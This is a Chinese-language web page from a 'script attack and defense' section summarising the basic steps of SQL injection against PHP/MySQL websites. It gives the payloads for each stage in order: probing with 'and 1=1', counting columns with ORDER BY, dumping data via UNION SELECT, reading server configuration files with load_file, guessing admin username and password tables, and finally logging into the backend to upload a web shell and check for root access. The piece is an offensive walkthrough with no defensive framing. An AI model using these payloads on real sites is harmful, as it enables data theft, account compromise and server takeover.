服务器 > 网络安全 > 脚本攻防

php注入基本步骤小结

33人参与 2011-04-01 脚本攻防

php注入十点基本步骤

1、判断是否存在注入,加'、and 1=1、and 1=2

2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询

3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10

4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。

(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)

5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。

8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换

9、同理再猜解password字段,猜解成功再找后台登录。

10、登录后台,上传shell。

11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

upfile asp文件上传 又一奇迹般的突破

04-01

Z-blog后台拿SHELL方法总结

04-01

浅说双引号被过滤时一句话的插入与防范

04-01

Ecshop后台拿shell方法总结

03-31

脚本入侵 入侵ewebeditor编辑器一些技巧

04-24

MSSQL中两种特别的执行命令的方法

03-28

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论